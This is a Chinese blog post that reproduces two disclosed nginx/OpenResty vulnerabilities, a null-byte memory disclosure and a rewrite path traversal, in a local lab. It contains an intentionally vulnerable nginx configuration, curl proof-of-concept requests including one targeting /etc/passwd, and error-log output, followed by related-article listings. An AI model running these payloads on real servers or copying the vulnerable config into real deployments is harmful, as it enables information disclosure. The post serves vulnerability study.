Nginx/OpenResty内存泄漏/目录穿越漏洞

最新推荐文章于 2024-02-07 16:45:28 发布
最新推荐文章于 2024-02-07 16:45:28 发布
阅读量1w 收藏 1
点赞数 1
分类专栏: Linux-Unix 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/104986049
版权

影响版本

nginx <= v1.17.7 (commit af8ea176a743e97d767b3e1439d549b52dd0367a)

openresty <= v1.15.8.2
在这里插入图片描述

原理参考

It can disclose the
fragment of the process memory with 301/302 HTTP reply if rewrite string
contains ASCII 0 character.

https://hackerone.com/reports/513236

参考配置

openresty的nginx配置文件:/usr/local/openresty/nginx/conf/nginx.conf
可执行nginx文件:/usr/local/openresty/nginx/sbin/nginx
启动nginx方式:sudo /usr/local/openresty/nginx/sbin/nginx

user root;
worker_processes 10;
error_log logs/error.log;
events {
    worker_connections 1024;
}
http {
    include mime.types;
    default_type application/octet-stream;
    client_max_body_size 50m;
    sendfile on;
    keepalive_timeout 65;
    gzip on;

    server {
        listen 80;
        server_name  localhost;

        #access_log logs/access.log  main;

        # 内存泄漏
        location ~ /memleak {
            rewrite_by_lua_block {
                ngx.req.read_body();
                local args, err = ngx.req.get_post_args();
                ngx.req.set_uri( args["url"], true );
            }
        }

        # 路径穿越
        location ~ /rewrite {
            rewrite ^.*$ $arg_x;
        }
    }
}
内存泄漏
curl http://127.0.0.1:80/memleak -d "url=%00asdfasdfasdfdddddcqq" -vv

截图中标准的地方是一块随机内存。
在这里插入图片描述
在这里插入图片描述
关键的是这里的%00被url解码之后是null字节,根据nginx的配置在处理null字节的时候出错?
这里换成%0a之后无法触发:
在这里插入图片描述

路径穿越
curl http://127.0.0.1:80/rewrite?x=/../../../../../etc/passwd

在这里插入图片描述
从nginx的error.log可以看到

2020/03/19 20:13:20 [error] 31218#31218: *10 open() "/usr/local/openresty/nginx/html../../../etc/passwd" failed (2: No such file or directory), client: 192.168.85.1, server: localhost, request: "GET /rewrite?x=../../../etc/passwd HTTP/1.1", host: "192.168.85.129"
2020/03/19 20:13:37 [error] 31218#31218: *11 open() "/usr/local/openresty/nginx/html../../../../../etc/passwd" failed (2: No such file or directory), client: 192.168.85.1, server: localhost, request: "GET /rewrite?x=../../../../../etc/passwd HTTP/1.1", host: "192.168.85.129"
2020/03/19 20:13:45 [error] 31218#31218: *13 open() "/usr/local/openresty/nginx/html/../../../etc/passwd" failed (2: No such file or directory), client: 192.168.85.1, server: localhost, request: "GET /rewrite?x=/../../../etc/passwd HTTP/1.1", host: "192.168.85.129"

这里的路径是相对于/usr/local/openresty/nginx/html的。

参考:

  • https://mp.weixin.qq.com/s/VqdiYa8jgjN2TdbtVAJRGw
  • https://www.runoob.com/w3cnote/nginx-setup-intro.html
  • https://blog.csdn.net/xuyw10000/article/details/77683962
  • https://www.openwall.com/lists/oss-security/2020/03/18/1
caiqiiqi
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
zabbix监控Nginx/Tomcat/MySQL
02-24
A机器:zabbix服务端(192.168.234.128)B机器:zabbix客户端(192.168.234.125)在B机器(zabbix客户端)操作:编辑nginx虚拟主机配置文件:在server{}中添加以下内容:重载nginx配置:测试:#nginx状态信息已显示状态说明:添加监控脚本:添加以下内容:添加权限:编辑zabbix_agent配置文件:在Option:UserParameter处添加:重启服务:在A机器(服务端)测试:在本机创建.xml文件并添加以下内容:(文件名称自定义)在zabbix前端页面点击配置→模板→导入:#导入刚才创建的xml文件即可导入成功后在主机列表页面选
Nginx/OpenResty内存泄漏/目录穿越漏洞通告
爱国小白帽
03-19 7360
Nginx/OpenResty内存泄漏/目录穿越漏洞通告 原创 360-CERT [360CERT](javascript:void(0)???? 今天 0x00 漏洞背景 2020年03月18日, 360CERT监测发现 openwall oss-security 邮件组披露了两枚漏洞。在特定配置下 nginx/openresty 存在 内存泄漏漏洞/目录穿越漏洞Nginx 是异步框架的网页服务...
Nginx/OpenResty目录穿越漏洞复现
小小猪的博客
11-26 1万+
Nginx/OpenResty目录穿越漏洞复现 漏洞背景: 2020年03月18日, 360CERT监测发现 openwall oss-security 邮件组披露了两枚漏洞。在特定配置下 nginx/openresty 存在 内存泄漏漏洞/目录穿越漏洞Nginx 是异步框架的网页服务器,也可以用作反向代理、负载平衡器和HTTP缓存。 OpenResty是一个基于nginx的Web平台,它对nginx增加LuaJIT引擎使其运行Lua脚本。 影响版本: nginx <= v1.17
目录穿越漏洞概念与实验
Au_Wind的博客
02-07 1120
概念和实验参考自portswigger – https://portswigger.net/web-security/file-path-traversal思维导图如下。
openresty-1.23.0.1.tar.gz
08-03
这个openresty包是基于官方最新代码 编译好的。 openresty中升级nginx openresty如何升级nginx的版本? Nginx <= 1.21.6 有RCE 漏洞。 修复nginx <= 1.21.5 爆出栈溢出rce漏洞openresty什么时候升级,或者如何单独升级nginx nginx内核版本升级到了1.23.0 2022年4月11日, NGINX发布安全公告,修复了一个NGINX LDAP参考实现中的一个代码执行漏洞漏洞编号:暂无,漏洞威胁等级:高危。 当满足以下一个或多个条件时,会出现此问题: ①命令行参数用于配置 nginx-ldap-auth Python 守护进程。 ②有未使用的可选 nginx-ldap-auth 配置参数。 ③nginx-ldap-auth 的 LDAP 身份验证取决于特定的组成员身份。 需要的自取。 编译时要 加上 --without-http_redis_module,因为
Windows上nginx-openresty添加rtmp模块
10-14
网上查找nginx-openresty添加rtmp模块的方法基本都是在Linux上的。但由于项目需要在Windows上使用nginx,无奈只好自己去找资料,在Windows上编译nginx-openresty同时加入rtmp模块。本资源是Windows上生成好的openresty-1.19.3.1+nginx-rtmp-module的包,同时包含win32、win64版本。
文件上传漏洞
kuzemax的博客
06-02 2607
文件头类型检查文件类型文件幻术头GIF 47 49 46 38 39 61(相当于文本的GIF89a)图片🐎制作方式将一句话木马植入图片中,一句话木马最好不要植入在图片的开头(有可能会造成文件损坏),Windows执行语句:copy xx.jpg/b+test.php/a test.jpg;Linux木马植入执行语句:cat test.php >> xx.jpg\b以二进制格式复制、合并文件 \a指定以ascll格式复制、合并文件。
OpenResty无损升级内嵌nginx版本0DAY漏洞
qq1071643762的博客
08-01 4924
OpenResty无损升级内嵌nginx版本,nginx
漏洞预警】Nginx/OpenResty 特殊配置下内存泄漏目录穿越漏洞
讯开技术孵化器博客
05-24 3247
Nginx/OpenResty 特殊配置下内存泄漏漏洞描述影响版本安全建议平滑升级nginx到最新版一、升级前准备二、平滑升级nginx 漏洞描述 阿里云应急响应中心监测到国外安全研究者公开了Nginx/OpenResty在特殊配置下存在内存泄漏目录穿越漏洞详情。 Nginx是一个高性能的HTTP和反向代理web服务器,OpenResty是一个基于 Nginx 与 Lua 的高性能Web平台。近日国外安全研究者公开了Nginx/OpenResty在特殊配置下存在内存泄漏目录穿越漏洞详情。由于Nginx
Nginx/OpenResty内存泄漏/目录穿越漏洞复现
sacredbook的博客
05-02 1万+
前言 最近一直在忙cissp的备考,好多前阵子做的一些技术调研没来得及整理成文章发出来,为了坚持每月至少一篇的更新,这次发的质量稍微水一些。前阵子Nginx/OpenResty爆出了2个漏洞,一个内存泄漏另一个目录遍历。当时在公司做了应急,复现的情况也一并做了记录,这两个漏洞原理相对比较简单,但影响面还是比较大的。 漏洞通报概况 2020 年 03 月 18 日,360 CERT 监测发现 op...
OpenShift 4 - 如何利用“风险镜像+配置漏洞”攻击应用 Secret(附视频)
多恩斯基的博客
10-07 594
》本文在 OpenShift 4 和 Kubernetes 1.20 环境中进行验证。
openresty-1.15.8.2
09-19
openresty-1.15.8.2 安装升级 附件为主要依赖包 详情连接 https://blog.csdn.net/weixin_42023321/article/details/101012291
nginx-openresty-windows:nginx用于带有openresty的窗口
02-06
适用于Windows的Nginx Openresty [语言:,] 最新版本 版本号:1.13.5.1001 32位下载地址: : 64位下载地址: : 发布时间:2017-09-28 修改日志:模块: 更新echo-nginx-module到0.61 更新ngx_postgres到1.0 更新ngx_lua_upstream到0.07 更新ngx-lua-module到0.10.10 更新LuaJIT到2.1-20170808 库: 更新lua-resty-core到0.1.12 更新lua-resty-dns到0.19 更新lua-resty-limit-流量到0.04 更新
OpenResty可伸缩的Web平台 v1.19.3.1
11-25
为您提供OpenResty可伸缩的Web平台下载,OpenResty是一个通过Lua扩展NGINX实现的可伸缩的Web平台。OpenResty(也称为 ngx_openresty)是一个基于Nginx与Lua的高性能Web平台,其内部集成了大量精良的Lua库、第三方模块以及大多数的依赖项。用于方便地搭建能够处理超高并发、扩展性极高的动态Web应用、Web服务和动态网关。OpenResty通过汇聚各种设计精良的Nginx模块(主要由OpenRest
openresty-1.15.8.1.tar.gz
07-10
OpenResty 是一个强大的 Web 应用服务器,Web 开发人员可以使用 Lua 脚本语言调动 Nginx 支持的各种 C 以及 Lua 模块,更主要的是在性能方面,OpenResty可以 快速构造出足以胜任 10K 以上并发连接响应的超高性能 Web 应用系统。
Nginx/Openresty中启用http2支持的方法教程
01-09
本文主要给大家介绍了关于Nginx/Openresty启用http2支持的相关内容,在开始介绍之前,我们先来看一看什么是http2。 以下摘自http2的介绍: HTTP/2 源自 SPDY/2 SPDY 系列协议由谷歌开发,于 2009 年公开。它的设计目标是降低 50% 的页面加载时间。当下很多著名的互联网公司,例如百度、淘宝、UPYUN 都在自己的网站或 APP 中采用了 SPDY 系列协议(当前最新版本是 SPDY/3.1),因为它对性能的提升是显而易见的。主流的浏览器(谷歌、火狐、Opera)也都早已经支持 SPDY,它已经成为了工业标准,HTTP Working-Group 最终决
打破基于OpenResty的WEB安全防护(CVE-2018-9230)1
08-03
影响版本:OpenResty 全版本源码版本: https://openresty.org/download/openresty-1.13.6.1.tar.gz
linux安装nginx/1.25.2
最新发布
03-07
linux安装nginx/1.25.2,并配置systemctl管理nginx的启动关闭状态等
nginx日志文件报错: connect() failed (111: Connection refused) while connecting to upstream
热门推荐
公众号shadow sock7
07-09 2万+
nginx日志文件报错: connect() failed (111: Connection refused) while connecting to upstream 网上搜到一篇类似的问题: http://corpus.hubwiz.com/2/node.js/29370360.html 而upstream为:http://127.0.0.1:8888 在Hawkeye的server目录中发...
openresty -t nginx: [emerg] unknown log format "main" in /usr/local/openresty/nginx/conf/nginx.conf:41 nginx: configuration file /usr/local/openresty/nginx/conf/nginx.conf test failed
07-14
如果一切顺利,你应该会看到类似于 "configuration file /usr/local/openresty/nginx/conf/nginx.conf test is successful" 的消息。 希望这能帮助你解决问题!如果还有其他疑问,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值